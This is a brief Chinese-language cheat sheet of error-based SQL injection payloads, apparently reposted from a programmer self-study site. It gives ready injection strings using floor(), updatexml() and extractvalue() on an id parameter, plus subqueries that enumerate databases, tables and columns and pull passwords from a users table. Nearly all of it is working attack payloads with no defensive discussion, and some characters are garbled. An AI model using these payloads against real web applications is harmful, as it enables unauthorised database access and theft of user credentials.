1.报错函数
(1).floor()报错
语句:
?id=1‘ union select 1,count( ),concat( payload ,floor(rand(0) 2))x from information_schema.columns group by x --+
(2).updatexml()报错
语句:
?id=1%27 and updatexml(1,concat(0x26, payload ,0x26),1);---+
(3).exvalue()报错
?id=1′ and extractvalue(1,concat(0x26,database(),0x26));--+
注:这些函数都只能爆出32位字符
2.查询payload
1.查数据库:database()
2.查表(要加括号):select table_name from information_schema.tables where table_schema=‘security‘ limit 3,1
3.列:select column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 1,1
4.字段:select password from users limit 0,1
sql注入
标签:and data- group select 函数 group by sch security ati
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did117483